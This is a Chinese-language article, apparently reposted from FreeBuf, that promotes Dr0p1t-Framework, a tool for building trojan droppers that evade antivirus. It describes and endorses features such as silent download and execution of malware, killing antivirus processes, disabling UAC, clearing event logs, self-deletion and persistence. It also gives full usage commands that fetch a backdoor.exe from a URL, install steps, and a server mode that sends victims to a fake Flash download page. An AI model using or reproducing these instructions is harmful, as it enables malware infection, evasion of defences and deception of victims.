Dr0p1t-Framework：一个可以绕过多数杀软的木马生成框架

相信对木马病毒有一定了解的人，一定听说过Trojan dropper。这是一种会在你的计算机上，释放和下载其他恶意软件的木马程序。作为一种较为典型的木马，它也极易遭到杀毒软件的查杀。那么有没有办法让我们的木马“隐身”呢？这里我向大家推荐一款叫做Dr0p1t的框架，利用它我们可以轻松地创建一个可以躲避大多数杀软的dropper程序。

特点

生成的可执行文件相关属性：

• 可执行文件的大小相对于其他以相同方式生成的dropper较小。
• 可在目标系统上下载可执行文件并静默执行
• 自毁功能，dropper在完成工作后将自动删除
• 躲避磁盘取证，并且在完全删除之前进行内容的清除
• 完成后清除事件日志。

框架属性：

• 适用于Windows，Linux，现已支持OSX（感谢@sm4sh3r）。
• Dr0p1t-Server（beta版）支持在浏览器使用，具体请参阅如何使用Dr0p1t-Server。
• Dr0p1t-Server（beta版）有一个scam选项，具体请参阅如何使用Dr0p1t-Server。

模块：

• 在正式运行恶意软件之前，会主动搜索并尝试强制关闭杀毒软件进程。
• 禁用UAC。
• 以管理员身份运行恶意软件。
• 伪装任意的文件图标及扩展。
• 支持ZIP格式，可在上传可执行文件之前将其压缩为ZIP文件。
• 在运行可执行文件之前可自定义选择文件类型如（batch | powershell | vbs）。
• 可以绕过PowerShell执行策略。
• 创建后使用UPX压缩dropper。

持久性模块：

• 将下载后的可执行文件自动添加到开机启动项。
• 将下载的可执行文件添加到计划任务中（UAC可忽略）。
• 将你的文件添加到powershell用户配置文件，以便你可以随时下载和运行文件。

界面截图

Windows

Linux (Kali linux)

OSX

还没有完全测试！ 需要一些贡献者和测试人员。

帮助菜单：

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      显示帮助信息和退出
-s              添加恶意软件到启动项(持久的)
-t              添加恶意软件到计划任务中(持久的)
-a              添加链接到powershell用户配置文件(持久的)
-k              在运行恶意软件之前强制关闭杀毒软件进程
-b              运行batch脚本之前运行你的恶意软件。检测脚本文件夹
-p              运行powershell脚本之前运行你的恶意软件。检测脚本文件夹
-v              运行vbs脚本之前运行你的恶意软件。检测脚本文件夹
--runas         绕过UAC以admin身份运行恶意软件
--spoof         文件扩展名欺骗
--zip           告诉Dr0p1t链接中的恶意软件被压缩为zip
--upx           创建后使用UPX压缩
--nouac         尝试在受害者设备上取消UAC支持
-i              文件图标欺骗。检测图标文件夹
--noclearevent  告诉框架不要在目标机器上完成任务后清除事件日志
--nocompile     告诉框架不编译最终文件。
--only32        仅下载32位设备的恶意软件
--only64        仅下载64位设备的恶意软件
-q              Stay quite ( 无banner信息 )
-u              检查更新
-nd             显示较少的输出信息

 举例：

./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

安装条件

Python 2或Python 3

如果是Python 2推荐使用2.7.x版本，如果是Python 3推荐使用3.5.x版本，这里注意不要使用3.6版，因为该版本目前还不支持PyInstaller。

Linux依赖

apt

其它依赖文件可以通过install.sh脚本安装

注：必须以root权限操作

windows依赖

pip

windows_requirements.txt中的模块

安装

Linux

git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py

Windows（下载ZIP后解压缩）

cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

注：在python 2.7中你没有pip，因此需要先从get-pip.py脚本安装它[Google可以找到]

测试系统：

• Kali Linux – SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Dr0p1t-Server

注：Dr0p1t-Server仍处在测试版阶段，有很多功能和设计需要大家一起添加和完善。

安装条件

稳定的互联网连接。

5000端口未被占用，并且防火墙配置为不阻止。

安装及运行server

在Linux和Windows上，通过执行上述步骤安装Dr0p1t后，我们使用以下命令安装server_requirements.txt中的模块：

python -m pip install -r server_requirements.txt

现在我们来运行我们的server脚本：

python Dr0p1t_Server.py

运行server脚本后，它将使用flask开始监听5000端口所有的通讯连接。

现在，我们就可以在浏览器中打开127.0.0.1:5000或[你的IP]:5000。

要从LAN中的其他设备打开[您的本地IP]：5000，并且WAN中的其他设备打开[全局IP]：5000，但请确保首先配置路由器以将端口5000连接转发给您。

注：如果想要在本地局域网内的其他设备[你的本地IP]:5000或无线局域网中的其他设备[全局IP]:5000打开，请首先确保你的路由器以配置端口转发。

打开server页面后，我们将看到一个设计简洁的数据提交界面。我们只需根据提示输入相应的内容即可。输入完成后我们点击提交，程序将为我们生成一个exe文件，并将我们重定向到一个虚假的Adobe Flash下载页面。

界面截图

查看更多关于Windows的截图

查看更多关于Linux的截图

virus total扫描结果：

*参考来源：Github，FB小编 secist 编译，转载请注明来自FreeBuf.COM